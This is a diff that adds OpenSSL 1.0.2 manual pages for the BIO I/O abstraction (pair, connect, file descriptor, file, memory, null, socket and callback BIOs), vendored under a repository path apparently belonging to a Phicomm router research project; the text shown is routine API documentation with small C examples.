+BIO_get_read_request() and BIO_ctrl_get_read_request() return the
+amount of data requested, or the buffer size if it is less, if the
+last read attempt at the other half of the BIO pair failed due to an
+empty buffer.  This can be used to determine how much data should be
+written to the BIO so the next read will succeed: this is most useful
+in TLS/SSL applications where the amount of data read is usually
+meaningful rather than just a buffer size. After a successful read
+this call will return zero.  It also will return zero once new data
+has been written satisfying the read request or part of it.
+Note that BIO_get_read_request() never returns an amount larger
+than that returned by BIO_get_write_guarantee().
+
+BIO_ctrl_reset_read_request() can also be used to reset the value returned by
+BIO_get_read_request() to zero.
+
+=head1 NOTES
+
+Both halves of a BIO pair should be freed. That is even if one half is implicit
+freed due to a BIO_free_all() or SSL_free() call the other half needs to be freed.
+
+When used in bidirectional applications (such as TLS/SSL) care should be taken to
+flush any data in the write buffer. This can be done by calling BIO_pending()
+on the other half of the pair and, if any data is pending, reading it and sending
+it to the underlying transport. This must be done before any normal processing
+(such as calling select() ) due to a request and BIO_should_read() being true.
+
+To see why this is important consider a case where a request is sent using
+BIO_write() and a response read with BIO_read(), this can occur during an
+TLS/SSL handshake for example. BIO_write() will succeed and place data in the write
+buffer. BIO_read() will initially fail and BIO_should_read() will be true. If
+the application then waits for data to be available on the underlying transport
+before flushing the write buffer it will never succeed because the request was
+never sent!
+
+=head1 RETURN VALUES
+
+BIO_new_bio_pair() returns 1 on success, with the new BIOs available in
+B<bio1> and B<bio2>, or 0 on failure, with NULL pointers stored into the
+locations for B<bio1> and B<bio2>. Check the error stack for more information.
+
+[XXXXX: More return values need to be added here]
+
+=head1 EXAMPLE
+
+The BIO pair can be used to have full control over the network access of an
+application. The application can call select() on the socket as required
+without having to go through the SSL-interface.
+
+ BIO *internal_bio, *network_bio;
+ ...
+ BIO_new_bio_pair(internal_bio, 0, network_bio, 0);
+ SSL_set_bio(ssl, internal_bio, internal_bio);
+ SSL_operations();
+ ...
+
+ application |   TLS-engine
+    |        |
+    +----------> SSL_operations()
+             |     /\    ||
+             |     ||    \/
+             |   BIO-pair (internal_bio)
+    +----------< BIO-pair (network_bio)
+    |        |
+  socket     |
+
+  ...
+  SSL_free(ssl);		/* implicitly frees internal_bio */
+  BIO_free(network_bio);
+  ...
+
+As the BIO pair will only buffer the data and never directly access the
+connection, it behaves non-blocking and will return as soon as the write
+buffer is full or the read buffer is drained. Then the application has to
+flush the write buffer and/or fill the read buffer.
+
+Use the BIO_ctrl_pending(), to find out whether data is buffered in the BIO
+and must be transfered to the network. Use BIO_ctrl_get_read_request() to
+find out, how many bytes must be written into the buffer before the
+SSL_operation() can successfully be continued.
+
+=head1 WARNING
+
+As the data is buffered, SSL_operation() may return with a ERROR_SSL_WANT_READ
+condition, but there is still data in the write buffer. An application must
+not rely on the error value of SSL_operation() but must assure that the
+write buffer is always flushed first. Otherwise a deadlock may occur as
+the peer might be waiting for the data before being able to continue.
+
+=head1 SEE ALSO
+
+L<SSL_set_bio(3)|SSL_set_bio(3)>, L<ssl(3)|ssl(3)>, L<bio(3)|bio(3)>,
+L<BIO_should_retry(3)|BIO_should_retry(3)>, L<BIO_read(3)|BIO_read(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_s_connect.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_s_connect.pod
new file mode 100644
index 0000000..18ece4c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_s_connect.pod
@@ -0,0 +1,192 @@
+=pod
+
+=head1 NAME
+
+BIO_s_connect, BIO_new_connect, BIO_set_conn_hostname, BIO_set_conn_port,
+BIO_set_conn_ip, BIO_set_conn_int_port, BIO_get_conn_hostname,
+BIO_get_conn_port, BIO_get_conn_ip, BIO_get_conn_int_port,
+BIO_set_nbio, BIO_do_connect - connect BIO
+
+=head1 SYNOPSIS
+
+ #include <openssl/bio.h>
+
+ BIO_METHOD * BIO_s_connect(void);
+
+ BIO *BIO_new_connect(char *name);
+
+ long BIO_set_conn_hostname(BIO *b, char *name);
+ long BIO_set_conn_port(BIO *b, char *port);
+ long BIO_set_conn_ip(BIO *b, char *ip);
+ long BIO_set_conn_int_port(BIO *b, char *port);
+ char *BIO_get_conn_hostname(BIO *b);
+ char *BIO_get_conn_port(BIO *b);
+ char *BIO_get_conn_ip(BIO *b, dummy);
+ long BIO_get_conn_int_port(BIO *b, int port);
+
+ long BIO_set_nbio(BIO *b, long n);
+
+ int BIO_do_connect(BIO *b);
+
+=head1 DESCRIPTION
+
+BIO_s_connect() returns the connect BIO method. This is a wrapper
+round the platform's TCP/IP socket connection routines.
+
+Using connect BIOs, TCP/IP connections can be made and data
+transferred using only BIO routines. In this way any platform
+specific operations are hidden by the BIO abstraction.
+
+Read and write operations on a connect BIO will perform I/O
+on the underlying connection. If no connection is established
+and the port and hostname (see below) is set up properly then
+a connection is established first.
+
+Connect BIOs support BIO_puts() but not BIO_gets().
+
+If the close flag is set on a connect BIO then any active
+connection is shutdown and the socket closed when the BIO
+is freed.
+
+Calling BIO_reset() on a connect BIO will close any active
+connection and reset the BIO into a state where it can connect
+to the same host again.
+
+BIO_get_fd() places the underlying socket in B<c> if it is not NULL,
+it also returns the socket . If B<c> is not NULL it should be of
+type (int *).
+
+BIO_set_conn_hostname() uses the string B<name> to set the hostname.
+The hostname can be an IP address. The hostname can also include the
+port in the form hostname:port . It is also acceptable to use the
+form "hostname/any/other/path" or "hostname:port/any/other/path".
+
+BIO_set_conn_port() sets the port to B<port>. B<port> can be the
+numerical form or a string such as "http". A string will be looked
+up first using getservbyname() on the host platform but if that
+fails a standard table of port names will be used. Currently the
+list is http, telnet, socks, https, ssl, ftp, gopher and wais.
+
+BIO_set_conn_ip() sets the IP address to B<ip> using binary form,
+that is four bytes specifying the IP address in big-endian form.
+
+BIO_set_conn_int_port() sets the port using B<port>. B<port> should
+be of type (int *).
+
+BIO_get_conn_hostname() returns the hostname of the connect BIO or
+NULL if the BIO is initialized but no hostname is set.
+This return value is an internal pointer which should not be modified.
+
+BIO_get_conn_port() returns the port as a string.
+
+BIO_get_conn_ip() returns the IP address in binary form.
+
+BIO_get_conn_int_port() returns the port as an int.
+
+BIO_set_nbio() sets the non blocking I/O flag to B<n>. If B<n> is
+zero then blocking I/O is set. If B<n> is 1 then non blocking I/O
+is set. Blocking I/O is the default. The call to BIO_set_nbio()
+should be made before the connection is established because 
+non blocking I/O is set during the connect process.
+
+BIO_new_connect() combines BIO_new() and BIO_set_conn_hostname() into
+a single call: that is it creates a new connect BIO with B<name>.
+
+BIO_do_connect() attempts to connect the supplied BIO. It returns 1
+if the connection was established successfully. A zero or negative
+value is returned if the connection could not be established, the
+call BIO_should_retry() should be used for non blocking connect BIOs
+to determine if the call should be retried.
+
+=head1 NOTES
+
+If blocking I/O is set then a non positive return value from any
+I/O call is caused by an error condition, although a zero return
+will normally mean that the connection was closed.
+
+If the port name is supplied as part of the host name then this will
+override any value set with BIO_set_conn_port(). This may be undesirable
+if the application does not wish to allow connection to arbitrary
+ports. This can be avoided by checking for the presence of the ':'
+character in the passed hostname and either indicating an error or
+truncating the string at that point.
+
+The values returned by BIO_get_conn_hostname(), BIO_get_conn_port(),
+BIO_get_conn_ip() and BIO_get_conn_int_port() are updated when a
+connection attempt is made. Before any connection attempt the values
+returned are those set by the application itself.
+
+Applications do not have to call BIO_do_connect() but may wish to do
+so to separate the connection process from other I/O processing.
+
+If non blocking I/O is set then retries will be requested as appropriate.
+
+It addition to BIO_should_read() and BIO_should_write() it is also
+possible for BIO_should_io_special() to be true during the initial
+connection process with the reason BIO_RR_CONNECT. If this is returned
+then this is an indication that a connection attempt would block,
+the application should then take appropriate action to wait until
+the underlying socket has connected and retry the call.
+
+BIO_set_conn_hostname(), BIO_set_conn_port(), BIO_set_conn_ip(),
+BIO_set_conn_int_port(), BIO_get_conn_hostname(), BIO_get_conn_port(),
+BIO_get_conn_ip(), BIO_get_conn_int_port(), BIO_set_nbio() and
+BIO_do_connect() are macros.
+
+=head1 RETURN VALUES
+
+BIO_s_connect() returns the connect BIO method.
+
+BIO_get_fd() returns the socket or -1 if the BIO has not
+been initialized.
+
+BIO_set_conn_hostname(), BIO_set_conn_port(), BIO_set_conn_ip() and
+BIO_set_conn_int_port() always return 1.
+
+BIO_get_conn_hostname() returns the connected hostname or NULL is
+none was set.
+
+BIO_get_conn_port() returns a string representing the connected
+port or NULL if not set.
+
+BIO_get_conn_ip() returns a pointer to the connected IP address in
+binary form or all zeros if not set.
+
+BIO_get_conn_int_port() returns the connected port or 0 if none was
+set.
+
+BIO_set_nbio() always returns 1.
+
+BIO_do_connect() returns 1 if the connection was successfully
+established and 0 or -1 if the connection failed.
+
+=head1 EXAMPLE
+
+This is example connects to a webserver on the local host and attempts
+to retrieve a page and copy the result to standard output.
+
+
+ BIO *cbio, *out;
+ int len;
+ char tmpbuf[1024];
+ ERR_load_crypto_strings();
+ cbio = BIO_new_connect("localhost:http");
+ out = BIO_new_fp(stdout, BIO_NOCLOSE);
+ if(BIO_do_connect(cbio) <= 0) {
+	fprintf(stderr, "Error connecting to server\n");
+	ERR_print_errors_fp(stderr);
+	/* whatever ... */
+	}
+ BIO_puts(cbio, "GET / HTTP/1.0\n\n");
+ for(;;) {	
+	len = BIO_read(cbio, tmpbuf, 1024);
+	if(len <= 0) break;
+	BIO_write(out, tmpbuf, len);
+ }
+ BIO_free(cbio);
+ BIO_free(out);
+
+
+=head1 SEE ALSO
+
+TBA
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_s_fd.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_s_fd.pod
new file mode 100644
index 0000000..b1de1d1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_s_fd.pod
@@ -0,0 +1,89 @@
+=pod
+
+=head1 NAME
+
+BIO_s_fd, BIO_set_fd, BIO_get_fd, BIO_new_fd - file descriptor BIO
+
+=head1 SYNOPSIS
+
+ #include <openssl/bio.h>
+
+ BIO_METHOD *	BIO_s_fd(void);
+
+ #define BIO_set_fd(b,fd,c)	BIO_int_ctrl(b,BIO_C_SET_FD,c,fd)
+ #define BIO_get_fd(b,c)	BIO_ctrl(b,BIO_C_GET_FD,0,(char *)c)
+
+ BIO *BIO_new_fd(int fd, int close_flag);
+
+=head1 DESCRIPTION
+
+BIO_s_fd() returns the file descriptor BIO method. This is a wrapper
+round the platforms file descriptor routines such as read() and write().
+
+BIO_read() and BIO_write() read or write the underlying descriptor.
+BIO_puts() is supported but BIO_gets() is not.
+
+If the close flag is set then then close() is called on the underlying
+file descriptor when the BIO is freed.
+
+BIO_reset() attempts to change the file pointer to the start of file
+using lseek(fd, 0, 0).
+
+BIO_seek() sets the file pointer to position B<ofs> from start of file
+using lseek(fd, ofs, 0).
+
+BIO_tell() returns the current file position by calling lseek(fd, 0, 1).
+
+BIO_set_fd() sets the file descriptor of BIO B<b> to B<fd> and the close
+flag to B<c>.
+
+BIO_get_fd() places the file descriptor in B<c> if it is not NULL, it also
+returns the file descriptor. If B<c> is not NULL it should be of type
+(int *).
+
+BIO_new_fd() returns a file descriptor BIO using B<fd> and B<close_flag>.
+
+=head1 NOTES
+
+The behaviour of BIO_read() and BIO_write() depends on the behavior of the
+platforms read() and write() calls on the descriptor. If the underlying 
+file descriptor is in a non blocking mode then the BIO will behave in the
+manner described in the L<BIO_read(3)|BIO_read(3)> and L<BIO_should_retry(3)|BIO_should_retry(3)>
+manual pages.
+
+File descriptor BIOs should not be used for socket I/O. Use socket BIOs
+instead.
+
+=head1 RETURN VALUES
+
+BIO_s_fd() returns the file descriptor BIO method.
+
+BIO_reset() returns zero for success and -1 if an error occurred.
+BIO_seek() and BIO_tell() return the current file position or -1
+is an error occurred. These values reflect the underlying lseek()
+behaviour.
+
+BIO_set_fd() always returns 1.
+
+BIO_get_fd() returns the file descriptor or -1 if the BIO has not
+been initialized.
+
+BIO_new_fd() returns the newly allocated BIO or NULL is an error
+occurred.
+
+=head1 EXAMPLE
+
+This is a file descriptor BIO version of "Hello World":
+
+ BIO *out;
+ out = BIO_new_fd(fileno(stdout), BIO_NOCLOSE);
+ BIO_printf(out, "Hello World\n");
+ BIO_free(out);
+
+=head1 SEE ALSO
+
+L<BIO_seek(3)|BIO_seek(3)>, L<BIO_tell(3)|BIO_tell(3)>,
+L<BIO_reset(3)|BIO_reset(3)>, L<BIO_read(3)|BIO_read(3)>,
+L<BIO_write(3)|BIO_write(3)>, L<BIO_puts(3)|BIO_puts(3)>,
+L<BIO_gets(3)|BIO_gets(3)>, L<BIO_printf(3)|BIO_printf(3)>,
+L<BIO_set_close(3)|BIO_set_close(3)>, L<BIO_get_close(3)|BIO_get_close(3)>
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_s_file.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_s_file.pod
new file mode 100644
index 0000000..188aea3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_s_file.pod
@@ -0,0 +1,148 @@
+=pod
+
+=head1 NAME
+
+BIO_s_file, BIO_new_file, BIO_new_fp, BIO_set_fp, BIO_get_fp,
+BIO_read_filename, BIO_write_filename, BIO_append_filename,
+BIO_rw_filename - FILE bio
+
+=head1 SYNOPSIS
+
+ #include <openssl/bio.h>
+
+ BIO_METHOD *	BIO_s_file(void);
+ BIO *BIO_new_file(const char *filename, const char *mode);
+ BIO *BIO_new_fp(FILE *stream, int flags);
+
+ BIO_set_fp(BIO *b,FILE *fp, int flags);
+ BIO_get_fp(BIO *b,FILE **fpp);
+
+ int BIO_read_filename(BIO *b, char *name)
+ int BIO_write_filename(BIO *b, char *name)
+ int BIO_append_filename(BIO *b, char *name)
+ int BIO_rw_filename(BIO *b, char *name)
+
+=head1 DESCRIPTION
+
+BIO_s_file() returns the BIO file method. As its name implies it
+is a wrapper round the stdio FILE structure and it is a
+source/sink BIO.
+
+Calls to BIO_read() and BIO_write() read and write data to the
+underlying stream. BIO_gets() and BIO_puts() are supported on file BIOs.
+
+BIO_flush() on a file BIO calls the fflush() function on the wrapped
+stream.
+
+BIO_reset() attempts to change the file pointer to the start of file
+using fseek(stream, 0, 0).
+
+BIO_seek() sets the file pointer to position B<ofs> from start of file
+using fseek(stream, ofs, 0).
+
+BIO_eof() calls feof().
+
+Setting the BIO_CLOSE flag calls fclose() on the stream when the BIO
+is freed.
+
+BIO_new_file() creates a new file BIO with mode B<mode> the meaning
+of B<mode> is the same as the stdio function fopen(). The BIO_CLOSE
+flag is set on the returned BIO.
+
+BIO_new_fp() creates a file BIO wrapping B<stream>. Flags can be:
+BIO_CLOSE, BIO_NOCLOSE (the close flag) BIO_FP_TEXT (sets the underlying
+stream to text mode, default is binary: this only has any effect under
+Win32).
+
+BIO_set_fp() set the fp of a file BIO to B<fp>. B<flags> has the same
+meaning as in BIO_new_fp(), it is a macro.
+
+BIO_get_fp() retrieves the fp of a file BIO, it is a macro.
+
+BIO_seek() is a macro that sets the position pointer to B<offset> bytes
+from the start of file.
+
+BIO_tell() returns the value of the position pointer.
+
+BIO_read_filename(), BIO_write_filename(), BIO_append_filename() and
+BIO_rw_filename() set the file BIO B<b> to use file B<name> for
+reading, writing, append or read write respectively.
+
+=head1 NOTES
+
+When wrapping stdout, stdin or stderr the underlying stream should not
+normally be closed so the BIO_NOCLOSE flag should be set.
+
+Because the file BIO calls the underlying stdio functions any quirks
+in stdio behaviour will be mirrored by the corresponding BIO.
+
+On Windows BIO_new_files reserves for the filename argument to be
+UTF-8 encoded. In other words if you have to make it work in multi-
+lingual environment, encode file names in UTF-8.
+
+=head1 EXAMPLES
+
+File BIO "hello world":
+
+ BIO *bio_out;
+ bio_out = BIO_new_fp(stdout, BIO_NOCLOSE);
+ BIO_printf(bio_out, "Hello World\n");
+
+Alternative technique:
+
+ BIO *bio_out;
+ bio_out = BIO_new(BIO_s_file());
+ if(bio_out == NULL) /* Error ... */
+ if(!BIO_set_fp(bio_out, stdout, BIO_NOCLOSE)) /* Error ... */
+ BIO_printf(bio_out, "Hello World\n");
+
+Write to a file:
+
+ BIO *out;
+ out = BIO_new_file("filename.txt", "w");
+ if(!out) /* Error occurred */
+ BIO_printf(out, "Hello World\n");
+ BIO_free(out);
+
+Alternative technique:
+
+ BIO *out;
+ out = BIO_new(BIO_s_file());
+ if(out == NULL) /* Error ... */
+ if(!BIO_write_filename(out, "filename.txt")) /* Error ... */
+ BIO_printf(out, "Hello World\n");
+ BIO_free(out);
+
+=head1 RETURN VALUES
+
+BIO_s_file() returns the file BIO method.
+
+BIO_new_file() and BIO_new_fp() return a file BIO or NULL if an error
+occurred.
+
+BIO_set_fp() and BIO_get_fp() return 1 for success or 0 for failure
+(although the current implementation never return 0).
+
+BIO_seek() returns the same value as the underlying fseek() function:
+0 for success or -1 for failure.
+
+BIO_tell() returns the current file position.
+
+BIO_read_filename(), BIO_write_filename(),  BIO_append_filename() and
+BIO_rw_filename() return 1 for success or 0 for failure.
+
+=head1 BUGS
+
+BIO_reset() and BIO_seek() are implemented using fseek() on the underlying
+stream. The return value for fseek() is 0 for success or -1 if an error
+occurred this differs from other types of BIO which will typically return
+1 for success and a non positive value if an error occurred.
+
+=head1 SEE ALSO
+
+L<BIO_seek(3)|BIO_seek(3)>, L<BIO_tell(3)|BIO_tell(3)>,
+L<BIO_reset(3)|BIO_reset(3)>, L<BIO_flush(3)|BIO_flush(3)>,
+L<BIO_read(3)|BIO_read(3)>,
+L<BIO_write(3)|BIO_write(3)>, L<BIO_puts(3)|BIO_puts(3)>,
+L<BIO_gets(3)|BIO_gets(3)>, L<BIO_printf(3)|BIO_printf(3)>,
+L<BIO_set_close(3)|BIO_set_close(3)>, L<BIO_get_close(3)|BIO_get_close(3)>
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_s_mem.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_s_mem.pod
new file mode 100644
index 0000000..8f85e0d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_s_mem.pod
@@ -0,0 +1,115 @@
+=pod
+
+=head1 NAME
+
+BIO_s_mem, BIO_set_mem_eof_return, BIO_get_mem_data, BIO_set_mem_buf,
+BIO_get_mem_ptr, BIO_new_mem_buf - memory BIO
+
+=head1 SYNOPSIS
+
+ #include <openssl/bio.h>
+
+ BIO_METHOD *	BIO_s_mem(void);
+
+ BIO_set_mem_eof_return(BIO *b,int v)
+ long BIO_get_mem_data(BIO *b, char **pp)
+ BIO_set_mem_buf(BIO *b,BUF_MEM *bm,int c)
+ BIO_get_mem_ptr(BIO *b,BUF_MEM **pp)
+
+ BIO *BIO_new_mem_buf(void *buf, int len);
+
+=head1 DESCRIPTION
+
+BIO_s_mem() return the memory BIO method function. 
+
+A memory BIO is a source/sink BIO which uses memory for its I/O. Data
+written to a memory BIO is stored in a BUF_MEM structure which is extended
+as appropriate to accommodate the stored data.
+
+Any data written to a memory BIO can be recalled by reading from it.
+Unless the memory BIO is read only any data read from it is deleted from
+the BIO.
+
+Memory BIOs support BIO_gets() and BIO_puts().
+
+If the BIO_CLOSE flag is set when a memory BIO is freed then the underlying
+BUF_MEM structure is also freed.
+
+Calling BIO_reset() on a read write memory BIO clears any data in it. On a
+read only BIO it restores the BIO to its original state and the read only
+data can be read again.
+
+BIO_eof() is true if no data is in the BIO.
+
+BIO_ctrl_pending() returns the number of bytes currently stored.
+
+BIO_set_mem_eof_return() sets the behaviour of memory BIO B<b> when it is
+empty. If the B<v> is zero then an empty memory BIO will return EOF (that is
+it will return zero and BIO_should_retry(b) will be false. If B<v> is non
+zero then it will return B<v> when it is empty and it will set the read retry
+flag (that is BIO_read_retry(b) is true). To avoid ambiguity with a normal
+positive return value B<v> should be set to a negative value, typically -1.
+
+BIO_get_mem_data() sets B<pp> to a pointer to the start of the memory BIOs data
+and returns the total amount of data available. It is implemented as a macro.
+
+BIO_set_mem_buf() sets the internal BUF_MEM structure to B<bm> and sets the
+close flag to B<c>, that is B<c> should be either BIO_CLOSE or BIO_NOCLOSE.
+It is a macro.
+
+BIO_get_mem_ptr() places the underlying BUF_MEM structure in B<pp>. It is
+a macro.
+
+BIO_new_mem_buf() creates a memory BIO using B<len> bytes of data at B<buf>,
+if B<len> is -1 then the B<buf> is assumed to be null terminated and its
+length is determined by B<strlen>. The BIO is set to a read only state and
+as a result cannot be written to. This is useful when some data needs to be
+made available from a static area of memory in the form of a BIO. The
+supplied data is read directly from the supplied buffer: it is B<not> copied
+first, so the supplied area of memory must be unchanged until the BIO is freed.
+
+=head1 NOTES
+
+Writes to memory BIOs will always succeed if memory is available: that is
+their size can grow indefinitely.
+
+Every read from a read write memory BIO will remove the data just read with
+an internal copy operation, if a BIO contains a lot of data and it is
+read in small chunks the operation can be very slow. The use of a read only
+memory BIO avoids this problem. If the BIO must be read write then adding
+a buffering BIO to the chain will speed up the process.
+
+=head1 BUGS
+
+There should be an option to set the maximum size of a memory BIO.
+
+There should be a way to "rewind" a read write BIO without destroying
+its contents.
+
+The copying operation should not occur after every small read of a large BIO
+to improve efficiency.
+
+=head1 EXAMPLE
+
+Create a memory BIO and write some data to it:
+
+ BIO *mem = BIO_new(BIO_s_mem());
+ BIO_puts(mem, "Hello World\n"); 
+
+Create a read only memory BIO:
+
+ char data[] = "Hello World";
+ BIO *mem;
+ mem = BIO_new_mem_buf(data, -1);
+
+Extract the BUF_MEM structure from a memory BIO and then free up the BIO:
+
+ BUF_MEM *bptr;
+ BIO_get_mem_ptr(mem, &bptr);
+ BIO_set_close(mem, BIO_NOCLOSE); /* So BIO_free() leaves BUF_MEM alone */
+ BIO_free(mem);
+ 
+
+=head1 SEE ALSO
+
+TBA
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_s_null.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_s_null.pod
new file mode 100644
index 0000000..e5514f7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_s_null.pod
@@ -0,0 +1,37 @@
+=pod
+
+=head1 NAME
+
+BIO_s_null - null data sink
+
+=head1 SYNOPSIS
+
+ #include <openssl/bio.h>
+
+ BIO_METHOD *	BIO_s_null(void);
+
+=head1 DESCRIPTION
+
+BIO_s_null() returns the null sink BIO method. Data written to
+the null sink is discarded, reads return EOF.
+
+=head1 NOTES
+
+A null sink BIO behaves in a similar manner to the Unix /dev/null
+device.
+
+A null bio can be placed on the end of a chain to discard any data
+passed through it.
+
+A null sink is useful if, for example, an application wishes to digest some
+data by writing through a digest bio but not send the digested data anywhere.
+Since a BIO chain must normally include a source/sink BIO this can be achieved
+by adding a null sink BIO to the end of the chain
+
+=head1 RETURN VALUES
+
+BIO_s_null() returns the null sink BIO method.
+
+=head1 SEE ALSO
+
+TBA
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_s_socket.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_s_socket.pod
new file mode 100644
index 0000000..1c8d3a9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_s_socket.pod
@@ -0,0 +1,63 @@
+=pod
+
+=head1 NAME
+
+BIO_s_socket, BIO_new_socket - socket BIO
+
+=head1 SYNOPSIS
+
+ #include <openssl/bio.h>
+
+ BIO_METHOD *BIO_s_socket(void);
+
+ long BIO_set_fd(BIO *b, int fd, long close_flag);
+ long BIO_get_fd(BIO *b, int *c);
+
+ BIO *BIO_new_socket(int sock, int close_flag);
+
+=head1 DESCRIPTION
+
+BIO_s_socket() returns the socket BIO method. This is a wrapper
+round the platform's socket routines.
+
+BIO_read() and BIO_write() read or write the underlying socket.
+BIO_puts() is supported but BIO_gets() is not.
+
+If the close flag is set then the socket is shut down and closed
+when the BIO is freed.
+
+BIO_set_fd() sets the socket of BIO B<b> to B<fd> and the close
+flag to B<close_flag>.
+
+BIO_get_fd() places the socket in B<c> if it is not NULL, it also
+returns the socket. If B<c> is not NULL it should be of type (int *).
+
+BIO_new_socket() returns a socket BIO using B<sock> and B<close_flag>.
+
+=head1 NOTES
+
+Socket BIOs also support any relevant functionality of file descriptor
+BIOs.
+
+The reason for having separate file descriptor and socket BIOs is that on some
+platforms sockets are not file descriptors and use distinct I/O routines,
+Windows is one such platform. Any code mixing the two will not work on
+all platforms.
+
+BIO_set_fd() and BIO_get_fd() are macros.
+
+=head1 RETURN VALUES
+
+BIO_s_socket() returns the socket BIO method.
+
+BIO_set_fd() always returns 1.
+
+BIO_get_fd() returns the socket or -1 if the BIO has not been
+initialized.
+
+BIO_new_socket() returns the newly allocated BIO or NULL is an error
+occurred.
+
+=head1 SEE ALSO
+
+TBA
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_set_callback.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_set_callback.pod
new file mode 100644
index 0000000..4759556
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_set_callback.pod
@@ -0,0 +1,108 @@
+=pod
+
+=head1 NAME
+
+BIO_set_callback, BIO_get_callback, BIO_set_callback_arg, BIO_get_callback_arg,
+BIO_debug_callback - BIO callback functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/bio.h>
+
+ #define BIO_set_callback(b,cb)		((b)->callback=(cb))
+ #define BIO_get_callback(b)		((b)->callback)
+ #define BIO_set_callback_arg(b,arg)	((b)->cb_arg=(char *)(arg))
+ #define BIO_get_callback_arg(b)		((b)->cb_arg)
+
+ long BIO_debug_callback(BIO *bio,int cmd,const char *argp,int argi,
+	long argl,long ret);
+
+ typedef long (*callback)(BIO *b, int oper, const char *argp,
+			int argi, long argl, long retvalue);
+
+=head1 DESCRIPTION
+
+BIO_set_callback() and BIO_get_callback() set and retrieve the BIO callback,
+they are both macros. The callback is called during most high level BIO
+operations. It can be used for debugging purposes to trace operations on
+a BIO or to modify its operation.
+
+BIO_set_callback_arg() and BIO_get_callback_arg() are macros which can be
+used to set and retrieve an argument for use in the callback.
+
+BIO_debug_callback() is a standard debugging callback which prints
+out information relating to each BIO operation. If the callback
+argument is set if is interpreted as a BIO to send the information
+to, otherwise stderr is used.
+
+callback() is the callback function itself. The meaning of each
+argument is described below.
+
+The BIO the callback is attached to is passed in B<b>.
+
+B<oper> is set to the operation being performed. For some operations
+the callback is called twice, once before and once after the actual
+operation, the latter case has B<oper> or'ed with BIO_CB_RETURN.
+
+The meaning of the arguments B<argp>, B<argi> and B<argl> depends on
+the value of B<oper>, that is the operation being performed.
+
+B<retvalue> is the return value that would be returned to the
+application if no callback were present. The actual value returned
+is the return value of the callback itself. In the case of callbacks
+called before the actual BIO operation 1 is placed in retvalue, if
+the return value is not positive it will be immediately returned to
+the application and the BIO operation will not be performed.
+
+The callback should normally simply return B<retvalue> when it has
+finished processing, unless if specifically wishes to modify the
+value returned to the application.
+
+=head1 CALLBACK OPERATIONS
+
+=over 4
+
+=item B<BIO_free(b)>
+
+callback(b, BIO_CB_FREE, NULL, 0L, 0L, 1L) is called before the
+free operation.
+
+=item B<BIO_read(b, out, outl)>
+
+callback(b, BIO_CB_READ, out, outl, 0L, 1L) is called before
+the read and callback(b, BIO_CB_READ|BIO_CB_RETURN, out, outl, 0L, retvalue)
+after.
+
+=item B<BIO_write(b, in, inl)>
+
+callback(b, BIO_CB_WRITE, in, inl, 0L, 1L) is called before
+the write and callback(b, BIO_CB_WRITE|BIO_CB_RETURN, in, inl, 0L, retvalue)
+after.
+
+=item B<BIO_gets(b, out, outl)>
+
+callback(b, BIO_CB_GETS, out, outl, 0L, 1L) is called before
+the operation and callback(b, BIO_CB_GETS|BIO_CB_RETURN, out, outl, 0L, retvalue)
+after.
+
+=item B<BIO_puts(b, in)>
+
+callback(b, BIO_CB_WRITE, in, 0, 0L, 1L) is called before
+the operation and callback(b, BIO_CB_WRITE|BIO_CB_RETURN, in, 0, 0L, retvalue)
+after.
+
+=item B<BIO_ctrl(BIO *b, int cmd, long larg, void *parg)>
+
+callback(b,BIO_CB_CTRL,parg,cmd,larg,1L) is called before the call and
+callback(b,BIO_CB_CTRL|BIO_CB_RETURN,parg,cmd, larg,ret) after.
+
+=back
+
+=head1 EXAMPLE
+
+The BIO_debug_callback() function is a good example, its source is
+in crypto/bio/bio_cb.c
+
+=head1 SEE ALSO
+
+TBA
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_should_retry.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_should_retry.pod
new file mode 100644
index 0000000..b6d51f7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_should_retry.pod
@@ -0,0 +1,114 @@
+=pod
+
+=head1 NAME
+
+BIO_should_retry, BIO_should_read, BIO_should_write,
+BIO_should_io_special, BIO_retry_type, BIO_should_retry,
+BIO_get_retry_BIO, BIO_get_retry_reason - BIO retry functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/bio.h>
+
